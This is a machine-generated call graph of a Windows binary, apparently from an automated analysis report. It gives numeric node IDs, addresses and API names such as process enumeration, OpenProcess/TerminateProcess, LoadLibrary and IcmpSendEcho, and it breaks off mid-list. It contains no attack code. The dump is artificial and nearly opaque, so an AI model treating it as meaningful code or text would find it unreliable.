105129->105012 105130->105128 105132 93aa2 __wsopen_s 105131->105132 105133 93abb 105132->105133 105134 d40da ___scrt_fastfail 105132->105134 105135 95851 9 API calls 105133->105135 105137 d40f6 GetOpenFileNameW 105134->105137 105136 93ac4 105135->105136 105189 93a57 105136->105189 105138 d4145 105137->105138 105140 98577 8 API calls 105138->105140 105142 d415a 105140->105142 105142->105142 105144 93ad9 105207 962d5 105144->105207 105824 93624 7 API calls 105163->105824 105165 9347a 105166 935b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 105165->105166 105166->105034 105167->105023 105168->105030 105170 963e4 __wsopen_s 105169->105170 105171 98577 8 API calls 105170->105171 105172 96416 105170->105172 105171->105172 105173 9655e 8 API calls 105172->105173 105180 9644c 105172->105180 105173->105172 105174 9b329 8 API calls 105175 96543 105174->105175 105177 96a7c 8 API calls 105175->105177 105176 9b329 8 API calls 105176->105180 105178 9654f 105177->105178 105178->105067 105179 96a7c 8 API calls 105179->105180 105180->105176 105180->105179 105181 9651a 105180->105181 105182 9655e 8 API calls 105180->105182 105181->105174 105181->105178 105182->105180 105184 951f2 105183->105184 105185 951d4 105183->105185 105187 98577 8 API calls 105184->105187 105186 950b4 105185->105186 105188 9bed9 8 API calls 105185->105188 105186->105086 105187->105186 105188->105186 105190 d22d0 __wsopen_s 105189->105190 105191 93a64 GetLongPathNameW 105190->105191 105192 98577 8 API calls 105191->105192 105193 93a8c 105192->105193 105194 953f2 105193->105194 105195 9bf73 8 API calls 105194->105195 105196 95404 105195->105196 105197 95851 9 API calls 105196->105197 105198 9540f 105197->105198 105199 9541a 105198->105199 105200 d4d5b 105198->105200 105201 96a7c 8 API calls 105199->105201 105205 d4d7d 105200->105205 105243 ae36b 41 API calls 105200->105243 105203 95426 105201->105203 105237 91340 105203->105237 105206 95439 105206->105144 105244 96679 105207->105244 105238 91352 105237->105238 105242 91371 __fread_nolock 105237->105242 105241 b017b 8 API calls 105238->105241 105239 b014b 8 API calls 105240 91388 105239->105240 105240->105206 105241->105242 105242->105239 105243->105200 105423 9663e LoadLibraryA 105244->105423 105249 d5648 105252 966e7 68 API calls 105249->105252 105250 966a4 LoadLibraryExW 105431 96607 LoadLibraryA 105250->105431 105254 d564f 105252->105254 105256 96607 3 API calls 105254->105256 105258 d5657 105256->105258 105452 9684a 105258->105452 105424 96674 105423->105424 105425 96656 GetProcAddress 105423->105425 105428 be95b 105424->105428 105426 96666 105425->105426 105426->105424 105427 9666d FreeLibrary 105426->105427 105427->105424 105460 be89a 105428->105460 105430 96698 105430->105249 105430->105250 105432 9663b 105431->105432 105433 9661c GetProcAddress 105431->105433 105436 96720 105432->105436 105434 9662c 105433->105434 105434->105432 105435 96634 FreeLibrary 105434->105435 105435->105432 105437 b017b 8 API calls 105436->105437 105438 96735 105437->105438 105439 9423c 8 API calls 105438->105439 105440 96741 __fread_nolock 105439->105440 105441 d56c2 105440->105441 105445 9677c 105440->105445 105517 103a0e CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 105440->105517 105518 103a92 74 API calls 105441->105518 105444 9684a 40 API calls 105444->105445 105445->105444 105453 9685c 105452->105453 105454 d5760 105452->105454 105550 bec34 105453->105550 105462 be8a6 CallCatchBlock 105460->105462 105461 be8b4 105485 bf649 20 API calls __dosmaperr 105461->105485 105462->105461 105464 be8e4 105462->105464 105466 be8e9 105464->105466 105467 be8f6 105464->105467 105465 be8b9 105486 c2b5c 26 API calls pre_c_initialization 105465->105486 105487 bf649 20 API calls __dosmaperr 105466->105487 105477 c83e1 105467->105477 105471 be8c4 __fread_nolock 105471->105430 105472 be8ff 105473 be912 105472->105473 105474 be905 105472->105474 105478 c83ed CallCatchBlock 105477->105478 105490 c32d1 EnterCriticalSection 105478->105490 105480 c83fb 105491 c847b 105480->105491 105484 c842c __fread_nolock 105484->105472 105485->105465 105486->105471 105487->105471 105490->105480 105498 c849e 105491->105498 105492 c84f7 105493 c4ff0 __dosmaperr 20 API calls 105492->105493 105494 c8500 105493->105494 105496 c2d38 _free 20 API calls 105494->105496 105497 c8509 105496->105497 105503 c8408 105497->105503 105509 c3778 11 API calls 2 library calls 105497->105509 105498->105492 105498->105498 105498->105503 105507 b94fd EnterCriticalSection 105498->105507 105508 b9511 LeaveCriticalSection 105498->105508 105504 c8437 105503->105504 105511 c3319 LeaveCriticalSection 105504->105511 105506 c843e 105506->105484 105507->105498 105508->105498 105511->105506 105517->105441 105518->105445 105553 bec51 105550->105553 105554 bec5d CallCatchBlock 105553->105554 105824->105165 103107 e400f 103123 9eeb0 messages 103107->103123 103108 9f211 PeekMessageW 103108->103123 103109 9ef07 GetInputState 103109->103108 103109->103123 103111 e32cd TranslateAcceleratorW 103111->103123 103112 9f28f PeekMessageW 103112->103123 103113 9f104 timeGetTime 103113->103123 103114 9f273 TranslateMessage DispatchMessageW 103114->103112 103115 9f2af Sleep 103115->103123 103116 e4183 Sleep 103128 e4060 103116->103128 103118 e33e9 timeGetTime 103263 aaa65 9 API calls 103118->103263 103122 e421a GetExitCodeProcess 103125 e4246 CloseHandle 103122->103125 103126 e4230 WaitForSingleObject 103122->103126 103123->103108 103123->103109 103123->103111 103123->103112 103123->103113 103123->103114 103123->103115 103123->103116 103123->103118 103123->103128 103129 9f0d5 103123->103129 103139 9f450 103123->103139 103146 9f6d0 103123->103146 103169 a2b20 103123->103169 103234 ae915 103123->103234 103239 a0340 103123->103239 103262 af215 timeGetTime 103123->103262 103264 10446f 8 API calls 103123->103264 103265 103fe1 81 API calls __wsopen_s 103123->103265 103124 12345b GetForegroundWindow 103124->103128 103125->103128 103126->103123 103126->103125 103128->103122 103128->103123 103128->103124 103130 e3d51 103128->103130 103131 e42b8 Sleep 103128->103131 103266 1160b5 8 API calls 103128->103266 103267 ff292 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 103128->103267 103268 af215 timeGetTime 103128->103268 103269 fdd87 CreateToolhelp32Snapshot Process32FirstW 103128->103269 103130->103129 103131->103123 103140 9f46f 103139->103140 103141 9f483 103139->103141 103279 9e960 103140->103279 103311 103fe1 81 API calls __wsopen_s 103141->103311 103144 9f47a 103144->103123 103145 e4584 103145->103145 103147 9f6ef 103146->103147 103164 9f7dc messages 103147->103164 103360 b05b2 5 API calls __Init_thread_wait 103147->103360 103150 e45d9 103150->103164 103361 9bf73 103150->103361 103151 9bf73 8 API calls 103151->103164 103158 e45fd 103367 b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103158->103367 103159 a0340 224 API calls 103159->103164 103163 a1ca0 8 API calls 103163->103164 103164->103151 103164->103159 103164->103163 103165 9fae1 103164->103165 103167 103fe1 81 API calls 103164->103167 103351 9bed9 103164->103351 103355 9be2d 103164->103355 103359 ab35c 224 API calls 103164->103359 103368 b05b2 5 API calls __Init_thread_wait 103164->103368 103369 b0413 29 API calls __onexit 103164->103369 103370 b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103164->103370 103371 115231 101 API calls 103164->103371 103372 11731e 224 API calls 103164->103372 103165->103123 103167->103164 103170 a2b61 103169->103170 103171 a2fc0 103170->103171 103172 a2b86 103170->103172 103647 b05b2 5 API calls __Init_thread_wait 103171->103647 103174 e7bd8 103172->103174 103175 a2ba0 103172->103175 103610 117af9 103174->103610 103403 a3160 103175->103403 103176 a2fca 103186 a300b 103176->103186 103648 9b329 103176->103648 103180 a3160 9 API calls 103183 a2bc6 103180->103183 103181 e7be4 103181->103123 103185 a2bfc 103183->103185 103183->103186 103184 e7bed 103184->103123 103187 e7bfd 103185->103187 103192 a2c18 __fread_nolock 103185->103192 103186->103184 103655 9b4c8 8 API calls 103186->103655 103658 103fe1 81 API calls __wsopen_s 103187->103658 103190 a3049 103656 ae6e8 224 API calls 103190->103656 103191 a2fe4 103654 b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103191->103654 103192->103190 103195 e7c15 103192->103195 103201 b014b 8 API calls 103192->103201 103203 b017b 8 API calls 103192->103203 103209 a0340 224 API calls 103192->103209 103210 a2d3f 103192->103210 103211 e7c59 103192->103211 103214 e7c10 103192->103214 103659 103fe1 81 API calls __wsopen_s 103195->103659 103197 e7c78 103661 1161a2 53 API calls _wcslen 103197->103661 103198 a2d4c 103199 a3160 9 API calls 103198->103199 103205 a2d59 103199->103205 103201->103192 103202 a3082 103657 afe39 8 API calls 103202->103657 103203->103192 103204 e7da1 103204->103214 103662 103fe1 81 API calls __wsopen_s 103204->103662 103205->103204 103206 a3160 9 API calls 103205->103206 103212 a2d73 103206->103212 103209->103192 103210->103197 103210->103198 103660 103fe1 81 API calls __wsopen_s 103211->103660 103212->103204 103215 9bed9 8 API calls 103212->103215 103217 a2dd7 messages 103212->103217 103214->103123 103215->103217 103216 a3160 9 API calls 103216->103217 103217->103202 103217->103204 103217->103214 103217->103216 103219 a2e8b messages 103217->103219 103413 aac3e 103217->103413 103432 11a9ac 103217->103432 103440 11ab3f 103217->103440 103462 10f94a 103217->103462 103471 119fe8 103217->103471 103474 11a6aa 103217->103474 103482 10664c 103217->103482 103489 11a5b2 103217->103489 103495 119ffc 103217->103495 103498 110fb8 103217->103498 103523 af950 103217->103523 103530 98bda 103217->103530 103605 11ad47 103217->103605 103218 a2f2d 103218->103123 103219->103218 103646 ae322 8 API calls messages 103219->103646 103235 ae959 103234->103235 103236 ae928 103234->103236 103235->103123 103236->103235 103237 ae94c IsDialogMessageW 103236->103237 103238 eeff6 GetClassLongW 103236->103238 103237->103235 103237->103236 103238->103236 103238->103237 103258 a0376 messages 103239->103258 103240 b05b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 103240->103258 103241 b0413 29 API calls pre_c_initialization 103241->103258 103242 e632b 104297 103fe1 81 API calls __wsopen_s 103242->104297 103244 a1695 103250 9bed9 8 API calls 103244->103250 103256 a049d messages 103244->103256 103245 b014b 8 API calls 103245->103258 103246 a0aae messages 104295 103fe1 81 API calls __wsopen_s 103246->104295 103248 e5cdb 103255 9bed9 8 API calls 103248->103255 103248->103256 103249 e625a 104296 103fe1 81 API calls __wsopen_s 103249->104296 103250->103256 103253 9bed9 8 API calls 103253->103258 103255->103256 103256->103123 103257 9bf73 8 API calls 103257->103258 103258->103240 103258->103241 103258->103242 103258->103244 103258->103245 103258->103246 103258->103248 103258->103249 103258->103253 103258->103256 103258->103257 103259 e6115 103258->103259 103260 b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 103258->103260 104222 a1990 103258->104222 104284 a1e50 103258->104284 104294 103fe1 81 API calls __wsopen_s 103259->104294 103260->103258 103262->103123 103263->103123 103264->103123 103265->103123 103266->103128 103267->103128 103268->103128 104318 fe80e 103269->104318 103271 fde86 CloseHandle 103271->103128 103272 fddd4 Process32NextW 103272->103271 103277 fddcd 103272->103277 103273 9bf73 8 API calls 103273->103277 103274 9b329 8 API calls 103274->103277 103275 9568e 8 API calls 103275->103277 103276 97bb5 8 API calls 103276->103277 103277->103271 103277->103272 103277->103273 103277->103274 103277->103275 103277->103276 104324 ae36b 41 API calls 103277->104324 103280 a0340 224 API calls 103279->103280 103298 9e99d 103280->103298 103281 e31d3 103343 103fe1 81 API calls __wsopen_s 103281->103343 103283 9ea0b messages 103283->103144 103284 9eac3 103286 9edd5 103284->103286 103287 9eace 103284->103287 103285 9ecff 103289 e31c4 103285->103289 103290 9ed14 103285->103290 103286->103283 103292 b017b 8 API calls 103286->103292 103320 b014b 103287->103320 103342 116162 8 API calls 103289->103342 103294 b014b 8 API calls 103290->103294 103291 9ebb8 103329 b017b 103291->103329 103300 9ead5 __fread_nolock 103292->103300 103303 9eb6a 103294->103303 103295 b014b 8 API calls 103295->103298 103297 b014b 8 API calls 103299 9eaf6 103297->103299 103298->103281 103298->103283 103298->103284 103298->103286 103298->103291 103298->103295 103306 9eb29 __fread_nolock messages 103298->103306 103299->103306 103312 9d260 103299->103312 103300->103297 103300->103299 103302 e31b3 103341 103fe1 81 API calls __wsopen_s 103302->103341 103303->103144 103306->103285 103306->103302 103306->103303 103307 e318e 103306->103307 103309 e316c 103306->103309 103338 944fe 224 API calls 103306->103338 103340 103fe1 81 API calls __wsopen_s 103307->103340 103339 103fe1 81 API calls __wsopen_s 103309->103339 103311->103145 103313 9d29a 103312->103313 103314 9d2c6 103312->103314 103315 9f6d0 224 API calls 103313->103315 103316 a0340 224 API calls 103314->103316 103318 9d2a0 103315->103318 103317 e184b 103316->103317 103317->103318 103344 103fe1 81 API calls __wsopen_s 103317->103344 103318->103306 103321 b0150 ___std_exception_copy 103320->103321 103322 b016a 103321->103322 103325 b016c 103321->103325 103345 b521d 7 API calls 2 library calls 103321->103345 103322->103300 103324 b09dd 103347 b3614 RaiseException 103324->103347 103325->103324 103346 b3614 RaiseException 103325->103346 103328 b09fa 103328->103300 103331 b014b ___std_exception_copy 103329->103331 103330 b016a 103330->103306 103331->103330 103334 b016c 103331->103334 103348 b521d 7 API calls 2 library calls 103331->103348 103333 b09dd 103350 b3614 RaiseException 103333->103350 103334->103333 103349 b3614 RaiseException 103334->103349 103337 b09fa 103337->103306 103338->103306 103339->103303 103340->103303 103341->103303 103342->103281 103343->103283 103344->103318 103345->103321 103346->103324 103347->103328 103348->103331 103349->103333 103350->103337 103352 9befc __fread_nolock 103351->103352 103353 9beed 103351->103353 103352->103164 103353->103352 103354 b017b 8 API calls 103353->103354 103354->103352 103356 9be38 103355->103356 103357 9be67 103356->103357 103373 9bfa5 103356->103373 103357->103164 103359->103164 103360->103150 103362 b017b 8 API calls 103361->103362 103363 9bf88 103362->103363 103364 b014b 8 API calls 103363->103364 103365 9bf96 103364->103365 103366 b0413 29 API calls __onexit 103365->103366 103366->103158 103367->103164 103368->103164 103369->103164 103370->103164 103371->103164 103372->103164 103390 9cf80 103373->103390 103375 9bfb5 103376 e0db6 103375->103376 103377 9bfc3 103375->103377 103399 9b4c8 8 API calls 103376->103399 103379 b014b 8 API calls 103377->103379 103380 9bfd4 103379->103380 103382 9bf73 8 API calls 103380->103382 103381 e0dc1 103383 9bfde 103382->103383 103384 9bfed 103383->103384 103385 9bed9 8 API calls 103383->103385 103386 b014b 8 API calls 103384->103386 103385->103384 103387 9bff7 103386->103387 103398 9be7b 39 API calls 103387->103398 103389 9c01b 103389->103357 103391 9d1c7 103390->103391 103396 9cf93 103390->103396 103391->103375 103393 9bf73 8 API calls 103393->103396 103394 9d03d 103394->103375 103396->103393 103396->103394 103400 b05b2 5 API calls __Init_thread_wait 103396->103400 103401 b0413 29 API calls __onexit 103396->103401 103402 b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103396->103402 103398->103389 103399->103381 103400->103396 103401->103396 103402->103396 103404 a31a1 103403->103404 103406 a317d 103403->103406 103663 b05b2 5 API calls __Init_thread_wait 103404->103663 103405 a2bb0 103405->103180 103406->103405 103665 b05b2 5 API calls __Init_thread_wait 103406->103665 103408 a31ab 103408->103406 103664 b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103408->103664 103410 a9f47 103410->103405 103666 b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103410->103666 103667 98ec0 103413->103667 103417 aac7f 103428 ab09b _wcslen 103417->103428 103709 9c98d 103417->103709 103421 abbbe 43 API calls 103421->103428 103424 96c03 8 API calls 103424->103428 103425 9c98d 39 API calls 103425->103428 103426 ab1fb 103426->103217 103427 98ec0 52 API calls 103427->103428 103428->103421 103428->103424 103428->103425 103428->103426 103428->103427 103695 9396b 103428->103695 103705 93907 103428->103705 103714 b4d98 103428->103714 103724 97ad5 103428->103724 103729 9ad40 8 API calls __fread_nolock 103428->103729 103730 97b1a 8 API calls 103428->103730 103731 98577 103428->103731 103433 11aa08 103432->103433 103439 11a9c8 103432->103439 103434 11aa26 103433->103434 103436 9c98d 39 API calls 103433->103436 103435 9c98d 39 API calls 103434->103435 103437 11aa8e 103434->103437 103434->103439 103435->103437 103436->103434 103843 100372 103437->103843 103439->103217 103441 98ec0 52 API calls 103440->103441 103442 11ab62 103441->103442 103443 fdd87 46 API calls 103442->103443 103444 11ab73 103443->103444 103445 11abc3 OpenProcess 103444->103445 103451 11ab78 103444->103451 103446 11acc2 TerminateProcess 103445->103446 103447 11abdd GetLastError 103445->103447 103448 11ad20 CloseHandle 103446->103448 103449 11accf GetLastError 103446->103449 103450 11abec 103447->103450 103459 11ac72 103447->103459 103448->103451 103457 11ace3 103449->103457 103901 fd715 12 API calls 103450->103901 103451->103217 103453 11abfa 103902 f2010 11 API calls messages 103453->103902 103455 11ac04 103456 11ac08 OpenProcess 103455->103456 103458 11ac1a 103455->103458 103456->103458 103457->103448 103903 f1a0b AdjustTokenPrivileges CloseHandle messages 103458->103903 103459->103446 103459->103451 103461 11ac70 103461->103459 103463 b017b 8 API calls 103462->103463 103464 10f95b 103463->103464 103904 9423c 103464->103904 103467 98ec0 52 API calls 103468 10f97c GetEnvironmentVariableW 103467->103468 103907 10160f 8 API calls 103468->103907 103470 10f999 messages 103470->103217 103908 1189b6 103471->103908 103473 119ff8 103473->103217 103475 11a705 103474->103475 103476 11a6c5 103474->103476 103478 9c98d 39 API calls 103475->103478 103479 11a723 103475->103479 103476->103217 103477 9c98d 39 API calls 103480 11a780 103477->103480 103478->103479 103479->103476 103479->103477 103479->103480 103481 100372 58 API calls 103480->103481 103481->103476 103483 98ec0 52 API calls 103482->103483 103484 106662 103483->103484 104034 fdc54 103484->104034 103486 10666a 103487 10666e GetLastError 103486->103487 103488 106683 103486->103488 103487->103488 103488->103217 103491 11a5c5 103489->103491 103490 98ec0 52 API calls 103492 11a632 103490->103492 103491->103490 103494 11a5d4 103491->103494 104128 1018a9 103492->104128 103494->103217 103496 1189b6 119 API calls 103495->103496 103497 11a00c 103496->103497 103497->103217 103499 110fe1 103498->103499 103500 11100f WSAStartup 103499->103500 103501 9c98d 39 API calls 103499->103501 103502 111054 103500->103502 103522 111023 messages 103500->103522 103503 110ffc 103501->103503 104169 ac1f6 103502->104169 103503->103500 103507 9c98d 39 API calls 103503->103507 103506 98ec0 52 API calls 103508 111069 103506->103508 103509 11100b 103507->103509 104174 af9d4 WideCharToMultiByte 103508->104174 103509->103500 103511 111075 inet_addr gethostbyname 103512 111093 IcmpCreateFile 103511->103512 103511->103522 103513 1110d3 103512->103513 103512->103522 103514 b017b 8 API calls 103513->103514 103515 1110ec 103514->103515 103516 9423c 8 API calls 103515->103516 103517 1110f7 103516->103517 103518 111102 IcmpSendEcho 103517->103518 103519 11112b IcmpSendEcho 103517->103519 103520 11114c 103518->103520 103519->103520 103521 111212 IcmpCloseHandle WSACleanup 103520->103521 103521->103522 103522->103217 103524 9c98d 39 API calls 103523->103524 103525 af964 103524->103525 103526 af96c timeGetTime 103525->103526 103527 efb20 Sleep 103525->103527 103528 9c98d 39 API calls 103526->103528 103529 af982 103528->103529 103529->103217 103531 98ec0 52 API calls 103530->103531 103532 98bf9 103531->103532 103533 98ec0 52 API calls 103532->103533 103534 98c0e 103533->103534 103535 98ec0 52 API calls 103534->103535 103536 98c21 103535->103536 103537 98ec0 52 API calls 103536->103537 103538 98c37 103537->103538 103539 97ad5 8 API calls 103538->103539 103540 98c4b 103539->103540 103541 d6767 103540->103541 103542 9c98d 39 API calls 103540->103542 103544 97e12 8 API calls 103541->103544 103543 98c72 103542->103543 103543->103541 103568 98c98 try_get_first_available_module 103543->103568 103545 d6786 103544->103545 103546 98470 8 API calls 103545->103546 103547 d6798 103546->103547 103550 98a60 8 API calls 103547->103550 103578 d67bd 103547->103578 103548 97e12 8 API calls 103551 98d4e 103548->103551 103549 98ec0 52 API calls 103553 98d27 103549->103553 103550->103578 103554 98d5c 103551->103554 103555 d6873 103551->103555 103552 98d3c 103552->103548 103559 98ec0 52 API calls 103553->103559 103560 d696e 103554->103560 103561 98d71 103554->103561 103557 d687d 103555->103557 103558 d68bc 103555->103558 103564 98470 8 API calls 103557->103564 103565 98470 8 API calls 103558->103565 103559->103552 103563 98470 8 API calls 103560->103563 103566 98470 8 API calls 103561->103566 103562 9893c 8 API calls 103562->103578 103569 d697b 103563->103569 103570 d6885 103564->103570 103571 d68c5 103565->103571 103567 98d79 103566->103567 103573 9bd57 8 API calls 103567->103573 103568->103549 103568->103552 103600 98d91 try_get_first_available_module 103568->103600 103575 98a60 8 API calls 103569->103575 103576 98ec0 52 API calls 103570->103576 103572 98a60 8 API calls 103571->103572 103577 d68e1 103572->103577 103573->103600 103574 98a60 8 API calls 103574->103578 103575->103600 103579 d6897 103576->103579 103583 98ec0 52 API calls 103577->103583 103578->103562 103578->103574 103603 98e71 103578->103603 104199 98844 8 API calls __fread_nolock 103578->104199 104200 98844 8 API calls __fread_nolock 103579->104200 103581 d68ab 103584 9893c 8 API calls 103581->103584 103586 d68fc 103583->103586 103587 d68b9 103584->103587 103585 9893c 8 API calls 103585->103600 104201 98844 8 API calls __fread_nolock 103586->104201 103595 98a60 8 API calls 103587->103595 103589 d69c1 103590 d69f1 103589->103590 103591 d69e5 103589->103591 104184 9893c 103590->104184 104202 9ad40 8 API calls __fread_nolock 103591->104202 103594 d6910 103598 9893c 8 API calls 103594->103598 103595->103603 103598->103587 103599 d69ef 103600->103585 103600->103589 103600->103603 104187 98844 8 API calls __fread_nolock 103600->104187 104188 98a60 103600->104188 103601 98a60 8 API calls 103602 d6a12 103601->103602 103604 9bd57 8 API calls 103602->103604 103603->103217 103604->103599 103606 98ec0 52 API calls 103605->103606 103607 11ad63 103606->103607 103608 fdd87 46 API calls 103607->103608 103609 11ad72 103608->103609 103609->103217 103611 117b52 103610->103611 103612 117b38 103610->103612 104205 1160e6 103611->104205 104216 103fe1 81 API calls __wsopen_s 103612->104216 103616 a0340 223 API calls 103617 117bc1 103616->103617 103618 117c5c 103617->103618 103621 117c03 103617->103621 103641 117b4a 103617->103641 103619 117cb0 103618->103619 103620 117c62 103618->103620 103622 98ec0 52 API calls 103619->103622 103619->103641 104217 101ad8 8 API calls 103620->104217 103626 10148b 8 API calls 103621->103626 103624 117cc2 103622->103624 103627 9c2c9 8 API calls 103624->103627 103625 117c85 104218 9bd07 8 API calls 103625->104218 103629 117c3b 103626->103629 103630 117ce6 CharUpperBuffW 103627->103630 103631 a2b20 223 API calls 103629->103631 103632 117d00 103630->103632 103631->103641 103633 117d53 103632->103633 103634 117d07 103632->103634 103635 98ec0 52 API calls 103633->103635 104212 10148b 103634->104212 103636 117d5b 103635->103636 104219 aaa65 9 API calls 103636->104219 103640 a2b20 223 API calls 103640->103641 103641->103181 103642 117d65 103642->103641 103643 98ec0 52 API calls 103642->103643 103644 117d80 103643->103644 104220 9bd07 8 API calls 103644->104220 103646->103219 103647->103176 103649 9b338 _wcslen 103648->103649 103650 b017b 8 API calls 103649->103650 103651 9b360 __fread_nolock 103650->103651 103652 b014b 8 API calls 103651->103652 103653 9b376 103652->103653 103653->103191 103654->103186 103655->103190 103656->103202 103657->103202 103658->103214 103659->103214 103660->103214 103661->103212 103662->103214 103663->103408 103664->103406 103665->103410 103666->103405 103668 98ed5 103667->103668 103684 98ed2 103667->103684 103669 98f0b 103668->103669 103670 98edd 103668->103670 103672 d6b1f 103669->103672 103675 98f1d 103669->103675 103676 d6a38 103669->103676 103743 b5536 26 API calls 103670->103743 103746 b54f3 26 API calls 103672->103746 103673 98eed 103680 b014b 8 API calls 103673->103680 103744 afe6f 51 API calls 103675->103744 103683 b017b 8 API calls 103676->103683 103689 d6ab1 103676->103689 103677 d6b37 103677->103677 103681 98ef7 103680->103681 103682 9b329 8 API calls 103681->103682 103682->103684 103685 d6a81 103683->103685 103690 abc58 103684->103690 103686 b014b 8 API calls 103685->103686 103687 d6aa8 103686->103687 103688 9b329 8 API calls 103687->103688 103688->103689 103745 afe6f 51 API calls 103689->103745 103691 b014b 8 API calls 103690->103691 103692 abc65 103691->103692 103693 9b329 8 API calls 103692->103693 103694 abc70 103693->103694 103694->103417 103696 93996 ___scrt_fastfail 103695->103696 103747 95f32 103696->103747 103699 93a1c 103701 d40cd Shell_NotifyIconW 103699->103701 103702 93a3a Shell_NotifyIconW 103699->103702 103751 961a9 103702->103751 103704 93a50 103704->103428 103706 93969 103705->103706 103707 93919 ___scrt_fastfail 103705->103707 103706->103428 103708 93938 Shell_NotifyIconW 103707->103708 103708->103706 103710 9c99e 103709->103710 103711 9c9a5 103709->103711 103710->103711 103828 b6641 39 API calls 103710->103828 103711->103428 103713 9c9e8 103713->103428 103715 b4e1b 103714->103715 103716 b4da6 103714->103716 103831 b4e2d 40 API calls 3 library calls 103715->103831 103718 b4dcb 103716->103718 103829 bf649 20 API calls __dosmaperr 103716->103829 103718->103428 103720 b4e28 103720->103428 103721 b4db2 103830 c2b5c 26 API calls pre_c_initialization 103721->103830 103723 b4dbd 103723->103428 103725 b017b 8 API calls 103724->103725 103726 97afa 103725->103726 103727 b014b 8 API calls 103726->103727 103728 97b08 103727->103728 103728->103428 103729->103428 103730->103428 103732 d6610 103731->103732 103733 98587 _wcslen 103731->103733 103833 9adf4 103732->103833 103736 9859d 103733->103736 103737 985c2 103733->103737 103735 d6619 103735->103735 103832 988e8 8 API calls 103736->103832 103738 b014b 8 API calls 103737->103738 103740 985ce 103738->103740 103742 b017b 8 API calls 103740->103742 103741 985a5 __fread_nolock 103741->103428 103742->103741 103743->103673 103744->103673 103745->103672 103746->103677 103748 95f4e 103747->103748 103749 939eb 103747->103749 103748->103749 103750 d5070 DestroyIcon 103748->103750 103749->103699 103781 fd11f 42 API calls 103749->103781 103750->103749 103752 961c6 103751->103752 103771 962a8 103751->103771 103753 97ad5 8 API calls 103752->103753 103754 961d4 103753->103754 103755 d5278 LoadStringW 103754->103755 103756 961e1 103754->103756 103759 d5292 103755->103759 103757 98577 8 API calls 103756->103757 103758 961f6 103757->103758 103760 96203 103758->103760 103767 d52ae 103758->103767 103762 9bed9 8 API calls 103759->103762 103764 96229 ___scrt_fastfail 103759->103764 103760->103759 103761 9620d 103760->103761 103782 96b7c 103761->103782 103762->103764 103769 9628e Shell_NotifyIconW 103764->103769 103767->103764 103768 d52f1 103767->103768 103770 9bf73 8 API calls 103767->103770 103801 afe6f 51 API calls 103768->103801 103769->103771 103772 d52d8 103770->103772 103771->103704 103800 fa350 9 API calls 103772->103800 103775 d5310 103777 96b7c 8 API calls 103775->103777 103776 d52e3 103778 97bb5 8 API calls 103776->103778 103779 d5321 103777->103779 103778->103768 103780 96b7c 8 API calls 103779->103780 103780->103764 103781->103699 103783 d57fe 103782->103783 103784 96b93 103782->103784 103786 b014b 8 API calls 103783->103786 103802 96ba4 103784->103802 103788 d5808 _wcslen 103786->103788 103787 9621b 103791 97bb5 103787->103791 103789 b017b 8 API calls 103788->103789 103790 d5841 __fread_nolock 103789->103790 103792 d641d 103791->103792 103793 97bc7 103791->103793 103827 f13c8 8 API calls __fread_nolock 103792->103827 103817 97bd8 103793->103817 103796 97bd3 103796->103764 103797 d6427 103798 d6433 103797->103798 103799 9bed9 8 API calls 103797->103799 103799->103798 103800->103776 103801->103775 103803 96bb4 _wcslen 103802->103803 103804 d5860 103803->103804 103805 96bc7 103803->103805 103806 b014b 8 API calls 103804->103806 103812 97d74 103805->103812 103809 d586a 103806->103809 103808 96bd4 __fread_nolock 103808->103787 103810 b017b 8 API calls 103809->103810 103811 d589a __fread_nolock 103810->103811 103813 97d8a 103812->103813 103816 97d85 __fread_nolock 103812->103816 103814 d6528 103813->103814 103815 b017b 8 API calls 103813->103815 103815->103816 103816->103808 103818 97c1b __fread_nolock 103817->103818 103819 97be7 103817->103819 103818->103796 103819->103818 103820 97c0e 103819->103820 103821 d644e 103819->103821 103822 97d74 8 API calls 103820->103822 103823 b014b 8 API calls 103821->103823 103822->103818 103824 d645d 103823->103824 103825 b017b 8 API calls 103824->103825 103826 d6491 __fread_nolock 103825->103826 103827->103797 103828->103713 103829->103721 103830->103723 103831->103720 103832->103741 103834 9ae0b __fread_nolock 103833->103834 103835 9ae02 103833->103835 103834->103735 103835->103834 103837 9c2c9 103835->103837 103838 9c2d9 __fread_nolock 103837->103838 103839 9c2dc 103837->103839 103838->103834 103840 b014b 8 API calls 103839->103840 103841 9c2e7 103840->103841 103842 b017b 8 API calls 103841->103842 103842->103838 103875 1002aa 103843->103875 103846 1003f3 103891 1005e9 56 API calls __fread_nolock 103846->103891 103847 10040b 103849 100471 103847->103849 103852 10041b 103847->103852 103850 1004a1 103849->103850 103851 100507 103849->103851 103868 100399 __fread_nolock 103849->103868 103853 1004d1 103850->103853 103854 1004a6 103850->103854 103855 1005b0 103851->103855 103856 100510 103851->103856 103857 100453 103852->103857 103892 102855 10 API calls 103852->103892 103853->103868 103896 9ca5b 39 API calls 103853->103896 103854->103868 103895 9ca5b 39 API calls 103854->103895 103855->103868 103900 9c63f 39 API calls 103855->103900 103858 100515 103856->103858 103859 10058d 103856->103859 103882 101844 103857->103882 103864 100554 103858->103864 103865 10051b 103858->103865 103859->103868 103899 9c63f 39 API calls 103859->103899 103864->103868 103898 9c63f 39 API calls 103864->103898 103865->103868 103897 9c63f 39 API calls 103865->103897 103868->103439 103870 100427 103893 102855 10 API calls 103870->103893 103873 10043e __fread_nolock 103894 102855 10 API calls 103873->103894 103876 1002f7 103875->103876 103881 1002bb 103875->103881 103877 9c98d 39 API calls 103876->103877 103879 1002f5 103877->103879 103878 98ec0 52 API calls 103878->103881 103879->103846 103879->103847 103879->103868 103880 b4d98 40 API calls 103880->103881 103881->103878 103881->103879 103881->103880 103883 10184f 103882->103883 103884 b014b 8 API calls 103883->103884 103885 101856 103884->103885 103886 101862 103885->103886 103887 101883 103885->103887 103888 b017b 8 API calls 103886->103888 103889 b017b 8 API calls 103887->103889 103890 